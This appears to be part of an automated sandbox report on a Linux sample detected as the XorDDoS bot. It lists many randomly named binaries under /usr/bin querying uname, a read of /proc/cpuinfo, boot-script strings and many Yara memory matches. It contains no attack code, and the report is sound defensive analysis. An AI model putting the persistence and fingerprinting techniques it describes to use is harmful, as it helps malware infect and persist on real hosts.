Source: /usr/bin/rlxosagpct (PID: 10319)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/rlxosagpct (PID: 10330)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/rlxosagpct (PID: 10341)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/rlxosagpct (PID: 10352)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/rlxosagpct (PID: 10363)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/pnljtnsppb (PID: 10374)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/pnljtnsppb (PID: 10385)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/pnljtnsppb (PID: 10396)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/pnljtnsppb (PID: 10407)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/pnljtnsppb (PID: 10418)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lhyaaotaph (PID: 10429)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lhyaaotaph (PID: 10440)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lhyaaotaph (PID: 10451)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lhyaaotaph (PID: 10461)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lhyaaotaph (PID: 10464)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/otigswehlv (PID: 10484)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/otigswehlv (PID: 10486)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/otigswehlv (PID: 10489)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/otigswehlv (PID: 10493)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/otigswehlv (PID: 10499)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/thzryslebl (PID: 10539)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/thzryslebl (PID: 10542)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/thzryslebl (PID: 10547)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/thzryslebl (PID: 10553)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/thzryslebl (PID: 10561)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/sunvkgnszw (PID: 10596)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/sunvkgnszw (PID: 10599)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/sunvkgnszw (PID: 10604)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/sunvkgnszw (PID: 10608)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/sunvkgnszw (PID: 10614)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/yclsxhkbli (PID: 10651)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/yclsxhkbli (PID: 10654)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/yclsxhkbli (PID: 10659)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/yclsxhkbli (PID: 10665)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/yclsxhkbli (PID: 10672)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nvlkgshfzs (PID: 10706)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nvlkgshfzs (PID: 10708)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nvlkgshfzs (PID: 10711)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nvlkgshfzs (PID: 10714)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nvlkgshfzs (PID: 10718)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wgerzwaeqg (PID: 10761)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wgerzwaeqg (PID: 10764)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wgerzwaeqg (PID: 10767)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wgerzwaeqg (PID: 10772)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wgerzwaeqg (PID: 10777)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/chvtxqzhiw (PID: 10816)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/chvtxqzhiw (PID: 10819)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/chvtxqzhiw (PID: 10824)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/chvtxqzhiw (PID: 10829)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/chvtxqzhiw (PID: 10834)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwevskbjgs (PID: 10871)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwevskbjgs (PID: 10874)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwevskbjgs (PID: 10877)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwevskbjgs (PID: 10882)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwevskbjgs (PID: 10889)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/kztofeuxtk (PID: 10926)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/kztofeuxtk (PID: 10928)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/kztofeuxtk (PID: 10931)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/kztofeuxtk (PID: 10933)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/kztofeuxtk (PID: 10938)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/tihvbqlbyh (PID: 10981)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/tihvbqlbyh (PID: 10984)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/tihvbqlbyh (PID: 10988)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/tihvbqlbyh (PID: 10995)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/tihvbqlbyh (PID: 11004)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/evsgasjgju (PID: 11036)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/evsgasjgju (PID: 11039)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/evsgasjgju (PID: 11043)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/evsgasjgju (PID: 11050)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/evsgasjgju (PID: 11055)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/jyfcwmvcim (PID: 11101)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/jyfcwmvcim (PID: 11103)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/jyfcwmvcim (PID: 11105)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/jyfcwmvcim (PID: 11109)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/jyfcwmvcim (PID: 11114)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nwaorjvecz (PID: 11156)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nwaorjvecz (PID: 11158)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nwaorjvecz (PID: 11160)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nwaorjvecz (PID: 11163)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/nwaorjvecz (PID: 11167)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/cqsoclzfrt (PID: 11211)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/cqsoclzfrt (PID: 11213)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/cqsoclzfrt (PID: 11215)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/cqsoclzfrt (PID: 11218)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/cqsoclzfrt (PID: 11222)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/udrzmjfbgf (PID: 11268)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/udrzmjfbgf (PID: 11270)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/udrzmjfbgf (PID: 11272)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/udrzmjfbgf (PID: 11274)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/udrzmjfbgf (PID: 11278)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwgryggbpq (PID: 11323)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwgryggbpq (PID: 11325)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwgryggbpq (PID: 11327)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwgryggbpq (PID: 11329)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwgryggbpq (PID: 11331)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/thqvayvyih (PID: 11378)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/thqvayvyih (PID: 11380)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/thqvayvyih (PID: 11382)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/thqvayvyih (PID: 11384)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/thqvayvyih (PID: 11386)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/fcpzadqmpt (PID: 11433)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/fcpzadqmpt (PID: 11435)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/fcpzadqmpt (PID: 11437)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/fcpzadqmpt (PID: 11439)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/fcpzadqmpt (PID: 11441)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ibtfyvoofm (PID: 11488)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ibtfyvoofm (PID: 11490)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ibtfyvoofm (PID: 11492)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ibtfyvoofm (PID: 11494)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ibtfyvoofm (PID: 11497)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/tlayyibcia (PID: 11543)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/tlayyibcia (PID: 11545)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/tlayyibcia (PID: 11547)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/tlayyibcia (PID: 11550)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/tlayyibcia (PID: 11553)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/dzlsbdiinr (PID: 11598)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/dzlsbdiinr (PID: 11600)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/dzlsbdiinr (PID: 11602)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/dzlsbdiinr (PID: 11604)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/dzlsbdiinr (PID: 11607)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwdfhkhfeq (PID: 11653)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwdfhkhfeq (PID: 11655)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwdfhkhfeq (PID: 11657)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwdfhkhfeq (PID: 11660)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qwdfhkhfeq (PID: 11664)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ldaqsdrmbu (PID: 11708)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ldaqsdrmbu (PID: 11710)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ldaqsdrmbu (PID: 11712)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ldaqsdrmbu (PID: 11714)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/ldaqsdrmbu (PID: 11717)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wuipuaslsy (PID: 11763)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wuipuaslsy (PID: 11765)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wuipuaslsy (PID: 11767)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wuipuaslsy (PID: 11769)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/wuipuaslsy (PID: 11772)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uvaewfcsxa (PID: 11818)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uvaewfcsxa (PID: 11820)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uvaewfcsxa (PID: 11822)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uvaewfcsxa (PID: 11825)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/uvaewfcsxa (PID: 11827)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bbynnggifo (PID: 11873)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bbynnggifo (PID: 11875)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bbynnggifo (PID: 11877)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bbynnggifo (PID: 11880)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/bbynnggifo (PID: 11884)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lcbdpulcrs (PID: 11930)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lcbdpulcrs (PID: 11932)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lcbdpulcrs (PID: 11934)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lcbdpulcrs (PID: 11938)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/lcbdpulcrs (PID: 11941)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vrbpjcuukk (PID: 11985)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vrbpjcuukk (PID: 11987)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vrbpjcuukk (PID: 11989)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vrbpjcuukk (PID: 11992)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/vrbpjcuukk (PID: 11996)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/potliirubi (PID: 12040)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/potliirubi (PID: 12042)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/potliirubi (PID: 12044)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/potliirubi (PID: 12047)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/potliirubi (PID: 12051)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qvavyybczk (PID: 12095)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qvavyybczk (PID: 12097)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qvavyybczk (PID: 12099)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qvavyybczk (PID: 12102)	Queries kernel information via 'uname':			Jump to behavior
Source: /usr/bin/qvavyybczk (PID: 12104)	Queries kernel information via 'uname':			Jump to behavior

Source: /tmp/dkuidbsedp (PID: 9446)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: .depend.boot.18.dr	Binary or memory string: qemu-kvm: mountkernfs.sh udev
Source: .depend.boot.18.dr	Binary or memory string: TARGETS = console-setup resolvconf alsa-utils mountkernfs.sh ufw plymouth-log hostname.sh lm-sensors screen-cleanup pppd-dns apparmor x11-common udev keyboard-setup mountdevsubfs.sh brltty procps qemu-kvm cryptdisks cryptdisks-early hwclock.sh open-iscsi networking iscsid checkroot.sh lvm2 urandom checkfs.sh mountall.sh mountall-bootclean.sh bootmisc.sh kmod mountnfs.sh checkroot-bootclean.sh mountnfs-bootclean.sh

Remote Access Functionality

Yara detected XorDDoS Bot

Source: Yara match	File source: dkuidbsedp, type: SAMPLE
Source: Yara match	File source: 10241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9656.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9689.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10153.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9999.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9644.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9568.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10032.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9821.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10417.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10307.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10197.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9623.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9678.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10406.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10428.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10296.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9799.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10120.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9733.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9964.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9777.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10098.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9909.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9612.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9854.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9557.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10043.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9920.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10010.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10186.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9887.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9700.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9755.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9711.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9445.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10142.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10054.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10373.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9975.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9546.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9810.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9865.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9988.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9942.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10065.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10219.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9579.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9722.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10076.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10175.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9601.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9590.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9788.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10109.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9843.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9766.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9953.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10021.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10087.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9931.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9667.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9744.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10164.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9898.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9457.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9634.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10252.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9832.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 10131.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 9876.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9445, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9450, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9453, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9457, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9546, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9557, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9579, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9590, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9601, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9623, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9634, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9667, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9678, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9689, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9711, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9722, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9733, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9755, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9766, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9777, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9799, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9810, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9821, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9843, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9854, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9865, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9887, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9898, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9909, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9931, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9942, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9953, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9975, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 9999, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10010, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10021, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dkuidbsedp PID: 10032, type: MEMORYSTR
